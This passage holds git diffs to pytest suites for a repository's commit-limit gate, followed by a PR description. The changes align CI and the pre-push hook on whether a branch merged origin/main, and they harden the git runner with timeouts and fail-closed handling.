+        "pre-push hook must deny relief for a merge of a landed side branch"
+    )
+    assert ci_grants is False, (
+        "CI must deny relief for a merge of a landed side branch (issue #3997)"
+    )

--- a/tests/validation/test_commit_limit_parity.py
+++ b/tests/validation/test_commit_limit_parity.py
@@ -17,6 +17,7 @@ and a history that should not be relieved is tested through both paths.
 from __future__ import annotations
 
 import subprocess
+from collections.abc import Sequence
 from pathlib import Path
 from typing import Any
 
@@ -247,12 +248,12 @@ def test_the_hook_reads_the_trunk_through_its_own_hardened_runner(
     real_policy_run_git = policy._run_git
     real_module_run_git = commit_count._run_git
 
-    def spy_policy(root: Path, args: Any) -> subprocess.CompletedProcess[str]:
+    def spy_policy(root: Path, args: Sequence[str]) -> subprocess.CompletedProcess[str]:
         if list(args)[:1] == ["rev-list"] and "--first-parent" in list(args):
             runners.append("git_hook_policy")
         return real_policy_run_git(root, args)
 
-    def spy_module(root: Path, args: Any) -> subprocess.CompletedProcess[str]:
+    def spy_module(root: Path, args: Sequence[str]) -> subprocess.CompletedProcess[str]:
         runners.append("pr_commit_count")
         return real_module_run_git(root, args)
 

--- a/tests/validation/test_commit_limit_parity.py
+++ b/tests/validation/test_commit_limit_parity.py
@@ -193,3 +193,72 @@ def test_both_gates_deny_relief_when_branch_merges_only_landed_side(tmp_path: Pa
     assert ci_grants is False, (
         "CI must deny relief for a merge of a landed side branch (issue #3997)"
     )
+
+
+# ---------------------------------------------------------------------------
+# Environment parity: the gates must also agree about the repository they read
+#
+# PR #4030 review: unifying the predicate on origin/main's first-parent trunk
+# only unifies the decision if both gates can actually read that ref. The hook
+# runs in a developer clone that has it; CI runs in whatever actions/checkout
+# produced. A shallow checkout has no origin/main, the trunk read fails closed,
+# and the same history gets 20 commits in CI and 40 at the hook: issue #3997's
+# divergence, reintroduced with the signs flipped.
+# ---------------------------------------------------------------------------
+
+
+def _strip_origin_main(repo: Path) -> None:
+    """Reproduce the CI checkout shape: a clone with no refs/remotes/origin/main."""
+    _git(repo, "update-ref", "-d", "refs/remotes/origin/main")
+
+
+def test_ci_denies_relief_for_a_real_main_merge_without_origin_main(tmp_path: Path) -> None:
+    """NEGATIVE CONTROL for the environment, not the predicate.
+
+    This is the failure the ref guarantee exists to prevent: identical history,
+    identical predicate, opposite answers, decided only by whether the checkout
+    populated origin/main. It pins why pr-validation.yml carries fetch-depth: 0.
+    """
+    repo, _base, head = _repo_branch_merges_main(tmp_path, "ci-shallow")
+    api_commits = _api_commits(repo, head)
+
+    assert commit_count.contains_main_merge(api_commits, repo) is True
+
+    _strip_origin_main(repo)
+
+    assert commit_count.main_first_parent_shas(repo) == frozenset()
+    assert commit_count.contains_main_merge(api_commits, repo) is False
+
+
+def test_the_hook_reads_the_trunk_through_its_own_hardened_runner(
+    tmp_path: Path,
+    monkeypatch: Any,
+) -> None:
+    """The hook shares the traversal, not the process invocation.
+
+    git_hook_policy bounds every git call and clears GIT_DIR and friends, which
+    git sets while a hook runs. Sharing the trunk reader must not quietly move a
+    hook's git call onto an unbounded runner with an inherited environment.
+    """
+    repo, _base, head = _repo_branch_merges_main(tmp_path, "hook-runner")
+    update = _push_update_for_feature(repo, _base, head)
+
+    runners: list[str] = []
+    real_policy_run_git = policy._run_git
+    real_module_run_git = commit_count._run_git
+
+    def spy_policy(root: Path, args: Any) -> subprocess.CompletedProcess[str]:
+        if list(args)[:1] == ["rev-list"] and "--first-parent" in list(args):
+            runners.append("git_hook_policy")
+        return real_policy_run_git(root, args)
+
+    def spy_module(root: Path, args: Any) -> subprocess.CompletedProcess[str]:
+        runners.append("pr_commit_count")
+        return real_module_run_git(root, args)
+
+    monkeypatch.setattr(policy, "_run_git", spy_policy)
+    monkeypatch.setattr(commit_count, "_run_git", spy_module)
+
+    assert policy._contains_main_merge(update, repo) is True
+    assert runners.count("git_hook_policy") == 1
+    assert "pr_commit_count" not in runners

--- a/tests/validation/test_pr_commit_count.py
+++ b/tests/validation/test_pr_commit_count.py
@@ -701,3 +701,115 @@ def test_main_first_parent_shas_excludes_non_first_parent_commits(tmp_path: Path
     result = mod.main_first_parent_shas(repo)
 
     assert side_sha not in result
+
+
+# ---------------------------------------------------------------------------
+# _run_git: the trunk reader's process hygiene (PR #4030 review)
+#
+# The pre-push hook now shares this module's trunk reader, so this runner sits
+# on a push path as well as a CI path. git_hook_policy's own runner bounds every
+# git call and disables the commit graph; the shared reader has to be at least
+# as careful or unifying the predicate would have traded a correctness bug for a
+# reliability one.
+# ---------------------------------------------------------------------------
+
+
+def _capture_run(monkeypatch: pytest.MonkeyPatch) -> list[dict[str, object]]:
+    """Record the argv and kwargs of every subprocess.run this module makes."""
+    calls: list[dict[str, object]] = []
+
+    def spy(args: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+        calls.append({"argv": list(args), **kwargs})
+        return subprocess.CompletedProcess(args, 0, "", "")
+
+    monkeypatch.setattr(mod.subprocess, "run", spy)
+    return calls
+
+
+def test_run_git_bounds_the_call_with_a_timeout(monkeypatch: pytest.MonkeyPatch) -> None:
+    """An unbounded `git rev-list` in a pre-push hook can wedge a push."""
+    calls = _capture_run(monkeypatch)
+
+    mod._run_git(Path("/repo"), ["rev-list", "--first-parent", "origin/main"])
+
+    assert calls[0]["timeout"] == mod._GIT_TIMEOUT_SECONDS
+    assert mod._GIT_TIMEOUT_SECONDS > 0
+
+
+def test_run_git_disables_the_commit_graph(monkeypatch: pytest.MonkeyPatch) -> None:
+    """A stale commit-graph can report a trunk the repository does not have.
+
+    git_hook_policy reads every commit this way. The relief decision must not
+    depend on which of the two gates happened to warm a cache.
+    """
+    calls = _capture_run(monkeypatch)
+
+    mod._run_git(Path("/repo"), ["rev-list", "--first-parent", "origin/main"])
+
+    assert calls[0]["argv"] == [
+        "git",
+        "-c",
+        "core.commitGraph=false",
+        "rev-list",
+        "--first-parent",
+        "origin/main",
+    ]
+
+
+def test_run_git_reports_a_timeout_instead_of_raising(monkeypatch: pytest.MonkeyPatch) -> None:
+    """Negative: a hung git denies relief; it does not crash the gate."""
+
+    def hang(args: list[str], **_kwargs: object) -> subprocess.CompletedProcess[str]:
+        raise subprocess.TimeoutExpired(args, mod._GIT_TIMEOUT_SECONDS)
+
+    monkeypatch.setattr(mod.subprocess, "run", hang)
+
+    result = mod._run_git(Path("/repo"), ["rev-list"])
+
+    assert result.returncode != 0
+    assert mod.main_first_parent_shas(Path("/repo")) == frozenset()
+
+
+def test_run_git_reports_a_missing_binary_instead_of_raising(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """Negative: the docstring promises fail-closed, so absent git cannot raise."""
+
+    def absent(args: list[str], **_kwargs: object) -> subprocess.CompletedProcess[str]:
+        raise FileNotFoundError("git")
+
+    monkeypatch.setattr(mod.subprocess, "run", absent)
+
+    result = mod._run_git(Path("/repo"), ["rev-list"])
+
+    assert result.returncode != 0
+    assert mod.main_first_parent_shas(Path("/repo")) == frozenset()
+
+
+def test_main_first_parent_shas_uses_an_injected_runner(tmp_path: Path) -> None:
+    """The hook supplies its own runner; the traversal stays shared.
+
+    Positive control for the seam that lets a hook keep its scrubbed git
+    environment without restating the first-parent walk.
+    """
+    seen: list[list[str]] = []
+
+    def fake_runner(_root: Path, args: list[str]) -> subprocess.CompletedProcess[str]:
+        seen.append(list(args))
+        return subprocess.CompletedProcess(["git", *args], 0, "sha-a sha-b\n", "")
+
+    result = mod.main_first_parent_shas(tmp_path, run_git=fake_runner)
+
+    assert result == frozenset({"sha-a", "sha-b"})
+    assert seen == [["rev-list", "--first-parent", "origin/main"]]
+
+
+def test_main_first_parent_shas_fails_closed_on_an_injected_runner_failure(
+    tmp_path: Path,
+) -> None:
+    """Negative: an injected runner that fails buys no relief either."""
+
+    def failing_runner(_root: Path, args: list[str]) -> subprocess.CompletedProcess[str]:
+        return subprocess.CompletedProcess(["git", *args], 1, "", "fatal: bad revision")
+
+    assert mod.main_first_parent_shas(tmp_path, run_git=failing_runner) == frozenset()

--- a/tests/validation/test_pr_commit_count.py
+++ b/tests/validation/test_pr_commit_count.py
@@ -12,6 +12,7 @@ import ast
 import json
 import subprocess
 import sys
+from collections.abc import Sequence
 from pathlib import Path
 
 import pytest
@@ -806,7 +807,7 @@ def test_main_first_parent_shas_uses_an_injected_runner(tmp_path: Path) -> None:
     """
     seen: list[list[str]] = []
 
-    def fake_runner(_root: Path, args: list[str]) -> subprocess.CompletedProcess[str]:
+    def fake_runner(_root: Path, args: Sequence[str]) -> subprocess.CompletedProcess[str]:
         seen.append(list(args))
         return subprocess.CompletedProcess(["git", *args], 0, "sha-a sha-b\n", "")
 
@@ -821,7 +822,7 @@ def test_main_first_parent_shas_fails_closed_on_an_injected_runner_failure(
 ) -> None:
     """Negative: an injected runner that fails buys no relief either."""
 
-    def failing_runner(_root: Path, args: list[str]) -> subprocess.CompletedProcess[str]:
+    def failing_runner(_root: Path, args: Sequence[str]) -> subprocess.CompletedProcess[str]:
         return subprocess.CompletedProcess(["git", *args], 1, "", "fatal: bad revision")
 
     assert mod.main_first_parent_shas(tmp_path, run_git=failing_runner) == frozenset()
@@ -896,7 +897,7 @@ def test_evidence_does_not_read_the_trunk_for_a_linear_branch(tmp_path: Path) ->
     """
     calls: list[Path] = []
 
-    def counting_runner(root: Path, _args: object) -> subprocess.CompletedProcess[str]:
+    def counting_runner(root: Path, _args: Sequence[str]) -> subprocess.CompletedProcess[str]:
         calls.append(root)
         return subprocess.CompletedProcess(["git"], 1, "", "")
 

--- a/tests/validation/test_pr_commit_count.py
+++ b/tests/validation/test_pr_commit_count.py
@@ -431,7 +431,9 @@ def test_a_branch_merging_main_is_not_blocked_below_forty(
     external_sha = "f" * 40
     monkeypatch.setattr(mod, "_run_gh", lambda argv: _completed(0, _merge_commits_json(25, True)))
     # main_first_parent_shas needs to confirm the external parent is on trunk.
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset([external_sha]))
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset([external_sha])
+    )
     monkeypatch.setenv("GITHUB_OUTPUT", str(tmp_path / "gh_out"))
     assert mod.main(["--pr-number", "42"]) == 0
     assert "::error::PR exceeds commit limit" not in capsys.readouterr().out
@@ -583,7 +585,9 @@ def test_contains_main_merge_grants_relief_when_external_parent_is_on_trunk(
         {"sha": "a" * 40, "parents": [{"sha": "0" * 40}]},
         {"sha": "b" * 40, "parents": [{"sha": "a" * 40}, {"sha": external_sha}]},
     ]
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset([external_sha]))
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset([external_sha])
+    )
     assert mod.contains_main_merge(commits, tmp_path) is True
 
 
@@ -603,7 +607,9 @@ def test_contains_main_merge_denies_relief_when_external_parent_is_not_on_trunk(
         {"sha": "b" * 40, "parents": [{"sha": "a" * 40}, {"sha": external_sha}]},
     ]
     # origin/main trunk does not contain the external SHA.
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["c" * 40]))
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset(["c" * 40])
+    )
     assert mod.contains_main_merge(commits, tmp_path) is False
 
 
@@ -615,7 +621,7 @@ def test_contains_main_merge_fails_closed_on_empty_trunk(
     commits = [
         {"sha": "a" * 40, "parents": [{"sha": "0" * 40}, {"sha": external_sha}]},
     ]
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset())
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root, _run=None: frozenset())
     assert mod.contains_main_merge(commits, tmp_path) is False
 
 
@@ -623,7 +629,9 @@ def test_contains_main_merge_is_false_for_linear_branch(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path
 ) -> None:
     """No merge commit means no relief."""
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["m" * 40]))
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset(["m" * 40])
+    )
     commits = [{"sha": f"{i:040x}", "parents": [{"sha": f"{i - 1:040x}"}]} for i in range(1, 5)]
     assert mod.contains_main_merge(commits, tmp_path) is False
 
@@ -637,7 +645,9 @@ def test_contains_main_merge_is_false_for_internal_merge(
         {"sha": "b" * 40, "parents": [{"sha": "0" * 40}]},
         {"sha": "c" * 40, "parents": [{"sha": "a" * 40}, {"sha": "b" * 40}]},
     ]
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["m" * 40]))
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset(["m" * 40])
+    )
     assert mod.contains_main_merge(commits, tmp_path) is False
 
 
@@ -645,7 +655,9 @@ def test_contains_main_merge_fails_closed_on_malformed_payload(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path
 ) -> None:
     """Malformed payload: no external SHAs found, no relief."""
-    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["m" * 40]))
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset(["m" * 40])
+    )
     assert mod.contains_main_merge(["not-a-dict"], tmp_path) is False
 
 
@@ -813,3 +825,158 @@ def test_main_first_parent_shas_fails_closed_on_an_injected_runner_failure(
         return subprocess.CompletedProcess(["git", *args], 1, "", "fatal: bad revision")
 
     assert mod.main_first_parent_shas(tmp_path, run_git=failing_runner) == frozenset()
+
+
+# ---------------------------------------------------------------------------
+# main_merge_evidence: telling "no main merge" apart from "no readable trunk"
+#
+# Both deny relief, but only one is an infrastructure fault. A gate that cannot
+# say which one it hit sends an author to re-cut a branch that was never the
+# problem, which is how a missing origin/main stayed invisible in the first
+# place (PR #4030 review).
+# ---------------------------------------------------------------------------
+
+
+def _merge_of(external_sha: str) -> list[object]:
+    return [
+        {"sha": "a" * 40, "parents": [{"sha": "b" * 40}]},
+        {"sha": "b" * 40, "parents": [{"sha": "c" * 40}, {"sha": external_sha}]},
+    ]
+
+
+def test_evidence_reports_a_readable_trunk_that_grants_relief(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    """Positive: relief granted, and nothing was wrong with the trunk read."""
+    external = "d" * 40
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset([external])
+    )
+
+    evidence = mod.main_merge_evidence(_merge_of(external), tmp_path)
+
+    assert evidence.granted is True
+    assert evidence.trunk_unreadable is False
+
+
+def test_evidence_separates_an_honest_denial_from_an_unreadable_trunk(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    """Negative: a real trunk that simply does not contain the merge parent.
+
+    This is the case an author can act on, so it must not be reported as an
+    infrastructure fault.
+    """
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset(["e" * 40])
+    )
+
+    evidence = mod.main_merge_evidence(_merge_of("d" * 40), tmp_path)
+
+    assert evidence.granted is False
+    assert evidence.trunk_unreadable is False
+
+
+def test_evidence_flags_an_unreadable_trunk(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    """Negative: an empty trunk is a fault, not evidence about the branch."""
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root, _run=None: frozenset())
+
+    evidence = mod.main_merge_evidence(_merge_of("d" * 40), tmp_path)
+
+    assert evidence.granted is False
+    assert evidence.trunk_unreadable is True
+
+
+def test_evidence_does_not_read_the_trunk_for_a_linear_branch(tmp_path: Path) -> None:
+    """Edge: no merge means no trunk read, so no fault to report either.
+
+    A linear branch must not be blamed on a checkout that was never consulted.
+    """
+    calls: list[Path] = []
+
+    def counting_runner(root: Path, _args: object) -> subprocess.CompletedProcess[str]:
+        calls.append(root)
+        return subprocess.CompletedProcess(["git"], 1, "", "")
+
+    linear = [{"sha": "a" * 40, "parents": [{"sha": "b" * 40}]}]
+
+    evidence = mod.main_merge_evidence(linear, tmp_path, counting_runner)
+
+    assert evidence == mod.ReliefEvidence(granted=False, trunk_unreadable=False)
+    assert calls == []
+
+
+def test_an_unreadable_trunk_warns_instead_of_failing_silently(
+    monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+) -> None:
+    """The CI gate has to say why it withheld the relief.
+
+    Without this the operator reads BLOCKED with no way to tell a branch that
+    merges nothing from a checkout that never fetched origin/main.
+    """
+    external = "d" * 40
+    monkeypatch.setattr(
+        mod, "_run_gh", lambda _argv: _completed(0, json.dumps(_merge_of(external)))
+    )
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root, _run=None: frozenset())
+
+    outcome = mod.fetch_commit_count(1, "o", "r")
+
+    assert outcome.limit == mod.BLOCK_THRESHOLD
+    out = capsys.readouterr().out
+    assert "::warning::" in out
+    assert "origin/main" in out
+    assert "fetch-depth: 0" in out
+
+
+def test_a_readable_trunk_warns_about_nothing(
+    monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+) -> None:
+    """Negative control: the warning must not fire on the healthy path."""
+    external = "d" * 40
+    monkeypatch.setattr(
+        mod, "_run_gh", lambda _argv: _completed(0, json.dumps(_merge_of(external)))
+    )
+    monkeypatch.setattr(
+        mod, "main_first_parent_shas", lambda _root, _run=None: frozenset([external])
+    )
+
+    outcome = mod.fetch_commit_count(1, "o", "r")
+
+    assert outcome.limit == mod.MAIN_MERGE_BLOCK_THRESHOLD
+    assert "::warning::" not in capsys.readouterr().out
+
+
+def test_the_hook_and_ci_give_the_trunk_read_the_same_budget() -> None:
+    """Both gates walk the same trunk, so they must be allowed the same time.
+
+    A shorter CI budget would let a slow runner time out on a walk the hook
+    completes, and the ceilings would diverge again on nothing but machine
+    speed. pr_commit_count cannot import the hook's constant (git_hook_policy
+    imports from this module, so the dependency only runs one way), which is
+    exactly why the equality needs a test rather than a shared name.
+    """
+    from scripts.validation import git_hook_policy
+
+    assert mod._GIT_TIMEOUT_SECONDS == git_hook_policy.DEFAULT_SUBPROCESS_TIMEOUT_SECONDS
+
+
+def test_a_git_timeout_is_not_reported_in_the_transient_vocabulary() -> None:
+    """A git timeout denies relief; it must not read as gh transport noise.
+
+    is_transient_error degrades the whole commit count to UNKNOWN. That is the
+    right answer for a flaky GitHub API and the wrong one for a wedged
+    rev-list, so the two must not share wording.
+    """
+
+    def timed_out(args: list[str], **_kwargs: object) -> subprocess.CompletedProcess[str]:
+        raise subprocess.TimeoutExpired(args, mod._GIT_TIMEOUT_SECONDS)
+
+    with pytest.MonkeyPatch.context() as patch:
+        patch.setattr(mod.subprocess, "run", timed_out)
+        result = mod._run_git(Path("/repo"), ["rev-list"])
+
+    assert result.returncode != 0
+    assert mod.is_transient_error(result.stderr) is False

--- a/tests/validation/test_pr_commit_count.py
+++ b/tests/validation/test_pr_commit_count.py
@@ -22,6 +22,33 @@ sys.path.insert(0, str(_PROJECT_ROOT))
 from scripts.validation import pr_commit_count as mod  # noqa: E402
 
 
+def _git(repo: Path, *args: str) -> subprocess.CompletedProcess[str]:
+    return subprocess.run(
+        ["git", *args],
+        cwd=repo,
+        text=True,
+        encoding="utf-8",
+        errors="replace",
+        capture_output=True,
+        check=True,
+    )
+
+
+def _init_repo(repo: Path) -> None:
+    repo.mkdir(parents=True, exist_ok=True)
+    _git(repo, "init", "-q", "-b", "main")
+    _git(repo, "config", "user.name", "Test User")
+    _git(repo, "config", "user.email", "user@example.com")
+
+
+def _commit(repo: Path, name: str) -> str:
+    f = repo / f"{name}.md"
+    f.write_text(f"{name}\n", encoding="utf-8")
+    _git(repo, "add", "--", str(f.name))
+    _git(repo, "commit", "-qm", f"test: {name}")
+    return _git(repo, "rev-parse", "HEAD").stdout.strip()
+
+
 def _completed(
     returncode: int, stdout: str = "", stderr: str = ""
 ) -> subprocess.CompletedProcess[str]:
@@ -333,9 +360,7 @@ def _merge_commits_json(n: int, external_parent: bool) -> str:
         {"sha": f"{i:040x}", "parents": [{"sha": f"{i - 1:040x}"}]} for i in range(n - 1)
     ]
     second = "f" * 40 if external_parent else f"{0:040x}"
-    commits.append(
-        {"sha": f"{n - 1:040x}", "parents": [{"sha": f"{n - 2:040x}"}, {"sha": second}]}
-    )
+    commits.append({"sha": f"{n - 1:040x}", "parents": [{"sha": f"{n - 2:040x}"}, {"sha": second}]})
     return json.dumps(commits)
 
 
@@ -403,9 +428,10 @@ def test_a_branch_merging_main_is_not_blocked_below_forty(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path, capsys: pytest.CaptureFixture[str]
 ) -> None:
     """25 commits with a merge from main passes CI, matching the pre-push hook."""
-    monkeypatch.setattr(
-        mod, "_run_gh", lambda argv: _completed(0, _merge_commits_json(25, True))
-    )
+    external_sha = "f" * 40
+    monkeypatch.setattr(mod, "_run_gh", lambda argv: _completed(0, _merge_commits_json(25, True)))
+    # main_first_parent_shas needs to confirm the external parent is on trunk.
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset([external_sha]))
     monkeypatch.setenv("GITHUB_OUTPUT", str(tmp_path / "gh_out"))
     assert mod.main(["--pr-number", "42"]) == 0
     assert "::error::PR exceeds commit limit" not in capsys.readouterr().out
@@ -418,9 +444,7 @@ def test_a_linear_branch_of_twenty_five_is_still_blocked(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path, capsys: pytest.CaptureFixture[str]
 ) -> None:
     """Negative control: the relief must not fire without a merge from the base."""
-    monkeypatch.setattr(
-        mod, "_run_gh", lambda argv: _completed(0, _merge_commits_json(25, False))
-    )
+    monkeypatch.setattr(mod, "_run_gh", lambda argv: _completed(0, _merge_commits_json(25, False)))
     monkeypatch.setenv("GITHUB_OUTPUT", str(tmp_path / "gh_out"))
     assert mod.main(["--pr-number", "42"]) == 0
     assert "::error::PR exceeds commit limit" in capsys.readouterr().out
@@ -467,9 +491,9 @@ def _ceilings_imported_in(source: str) -> set[str]:
 
 def test_the_hook_and_ci_read_the_same_two_ceilings() -> None:
     """Issue #3596: one number in one place. A second literal would drift."""
-    source = (
-        _PROJECT_ROOT / "scripts" / "validation" / "git_hook_policy.py"
-    ).read_text(encoding="utf-8")
+    source = (_PROJECT_ROOT / "scripts" / "validation" / "git_hook_policy.py").read_text(
+        encoding="utf-8"
+    )
 
     assert _ceilings_restated_in(source) == set()
     assert _ceilings_imported_in(source) == set(_CEILING_NAMES)
@@ -540,8 +564,140 @@ def test_malformed_parents_do_not_grant_the_relaxed_ceiling(
         ("empty payload", [], False),
     ],
 )
-def test_contains_base_merge_controls(
-    label: str, payload: list[object], expected: bool
-) -> None:
+def test_contains_base_merge_controls(label: str, payload: list[object], expected: bool) -> None:
     """Behaviour that must survive the malformed-parent narrowing unchanged."""
     assert mod.contains_base_merge(payload) is expected, label
+
+
+# ---------------------------------------------------------------------------
+# contains_main_merge: precise predicate using origin/main first-parent history
+# ---------------------------------------------------------------------------
+
+
+def test_contains_main_merge_grants_relief_when_external_parent_is_on_trunk(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """The external parent is on origin/main's trunk: relief is granted."""
+    external_sha = "e" * 40
+    commits = [
+        {"sha": "a" * 40, "parents": [{"sha": "0" * 40}]},
+        {"sha": "b" * 40, "parents": [{"sha": "a" * 40}, {"sha": external_sha}]},
+    ]
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset([external_sha]))
+    assert mod.contains_main_merge(commits, tmp_path) is True
+
+
+def test_contains_main_merge_denies_relief_when_external_parent_is_not_on_trunk(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """The critical divergence case from issue #3997.
+
+    An external parent that is NOT on origin/main's first-parent history (for
+    example, a side branch that was never merged to main) must NOT grant the
+    40-commit relief. The old contains_base_merge returned True here; the new
+    contains_main_merge returns False, matching the pre-push hook.
+    """
+    external_sha = "e" * 40
+    commits = [
+        {"sha": "a" * 40, "parents": [{"sha": "0" * 40}]},
+        {"sha": "b" * 40, "parents": [{"sha": "a" * 40}, {"sha": external_sha}]},
+    ]
+    # origin/main trunk does not contain the external SHA.
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["c" * 40]))
+    assert mod.contains_main_merge(commits, tmp_path) is False
+
+
+def test_contains_main_merge_fails_closed_on_empty_trunk(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """No origin/main means no relief: fail closed."""
+    external_sha = "e" * 40
+    commits = [
+        {"sha": "a" * 40, "parents": [{"sha": "0" * 40}, {"sha": external_sha}]},
+    ]
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset())
+    assert mod.contains_main_merge(commits, tmp_path) is False
+
+
+def test_contains_main_merge_is_false_for_linear_branch(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """No merge commit means no relief."""
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["m" * 40]))
+    commits = [{"sha": f"{i:040x}", "parents": [{"sha": f"{i - 1:040x}"}]} for i in range(1, 5)]
+    assert mod.contains_main_merge(commits, tmp_path) is False
+
+
+def test_contains_main_merge_is_false_for_internal_merge(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """A merge between two commits on the PR branch does not grant relief."""
+    commits = [
+        {"sha": "a" * 40, "parents": [{"sha": "0" * 40}]},
+        {"sha": "b" * 40, "parents": [{"sha": "0" * 40}]},
+        {"sha": "c" * 40, "parents": [{"sha": "a" * 40}, {"sha": "b" * 40}]},
+    ]
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["m" * 40]))
+    assert mod.contains_main_merge(commits, tmp_path) is False
+
+
+def test_contains_main_merge_fails_closed_on_malformed_payload(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """Malformed payload: no external SHAs found, no relief."""
+    monkeypatch.setattr(mod, "main_first_parent_shas", lambda _root: frozenset(["m" * 40]))
+    assert mod.contains_main_merge(["not-a-dict"], tmp_path) is False
+
+
+# ---------------------------------------------------------------------------
+# main_first_parent_shas: git-based trunk reader
+# ---------------------------------------------------------------------------
+
+
+def test_main_first_parent_shas_returns_trunk_commits(tmp_path: Path) -> None:
+    """main_first_parent_shas returns the SHAs on origin/main's trunk."""
+    repo = tmp_path / "main-trunk"
+    _init_repo(repo)
+    sha1 = _commit(repo, "first")
+    sha2 = _commit(repo, "second")
+    _git(repo, "update-ref", "refs/remotes/origin/main", "HEAD")
+
+    result = mod.main_first_parent_shas(repo)
+
+    assert sha1 in result
+    assert sha2 in result
+
+
+def test_main_first_parent_shas_returns_empty_when_origin_main_missing(
+    tmp_path: Path,
+) -> None:
+    """Fail closed: no origin/main means empty frozenset, no relief."""
+    repo = tmp_path / "no-origin"
+    _init_repo(repo)
+    _commit(repo, "base")
+
+    result = mod.main_first_parent_shas(repo)
+
+    assert result == frozenset()
+
+
+def test_main_first_parent_shas_excludes_non_first_parent_commits(tmp_path: Path) -> None:
+    """A branch that was merged into main is NOT on the trunk.
+
+    Its commits sit on the non-first parent of the landing merge, so they must
+    not be counted as trunk commits.
+    """
+    repo = tmp_path / "landed-branch"
+    _init_repo(repo)
+    _commit(repo, "base")
+    _git(repo, "branch", "side")
+    _git(repo, "checkout", "-q", "side")
+    side_sha = _commit(repo, "side-commit")
+    _git(repo, "checkout", "-q", "main")
+    _git(repo, "merge", "-q", "--no-ff", "-m", "land side", "side")
+    _commit(repo, "after")
+    _git(repo, "update-ref", "refs/remotes/origin/main", "HEAD")
+
+    result = mod.main_first_parent_shas(repo)
+
+    assert side_sha not in result


### PR DESCRIPTION
## Summary

The commit-limit relief gate ran two separate functions that made the same decision by different logic. CI used `contains_base_merge`, which granted relief whenever a non-first parent was absent from the PR's own commit list. The pre-push hook used `_contains_main_merge`, which required the non-first parent to appear in `origin/main`'s first-parent history. The two predicates disagreed on a real scenario: a feature branch that merges a side branch already landed on main received different limits depending on which gate evaluated it.

## Root cause

`contains_base_merge` checks "is any non-first parent outside the PR commit list?" The PR commit list is everything reachable from HEAD but not from main. A side branch that landed on main is reachable from main, so it is absent from the PR list, so `contains_base_merge` returns True and grants the 40-commit limit. `_contains_main_merge` checks "is any non-first parent on `origin/main`'s first-parent history?" A side branch merged into main via a non-fast-forward merge does NOT appear on the first-parent trunk, so `_contains_main_merge` returns False and keeps the 20-commit limit. Same history, contradictory governance.

## Changes

### Unifying the predicate

- `scripts/validation/pr_commit_count.py`: added `_run_git`, `main_first_parent_shas`, `_external_non_first_parent_shas`, and `contains_main_merge`. `fetch_commit_count` now decides the ceiling from the unified predicate. `contains_base_merge` keeps its name but its docstring documents it as the broader approximation it is.
- `scripts/validation/git_hook_policy.py`: imports `main_first_parent_shas` and drops the hook-local `_main_trunk_commits`. `_contains_main_merge` and `_merge_has_main_parent` read the trunk through the shared implementation.

### Making the unified predicate work where it runs (review round 2)

- `.github/workflows/pr-validation.yml`: pinned `fetch-depth: 0` on the checkout that hosts the gate. `contains_main_merge` reads `origin/main` with git, and a default `actions/checkout` is shallow: it creates only `refs/remotes/pull/<n>/merge`, so `git rev-list --first-parent origin/main` failed and the predicate fell to its fail-closed branch. CI could never grant the relief it had just been taught to compute, so a branch that really does merge main was capped at 20 in CI while the hook allowed 40. That is issue #3997's divergence with the signs flipped.
- `scripts/validation/pr_commit_count.py`: `main_first_parent_shas` takes an optional `run_git` runner. The hook passes its own, so a trunk read inside a hook keeps `git_hook_policy`'s scrubbed git environment (git sets `GIT_DIR` and `GIT_SHALLOW_FILE` while a hook runs) and its timeout reporting. The traversal stays one implementation. This module's own `_run_git` gained `core.commitGraph=false`, a 90s timeout matched to the hook's, and fail-closed handling that returns a non-zero result instead of raising when git is absent.

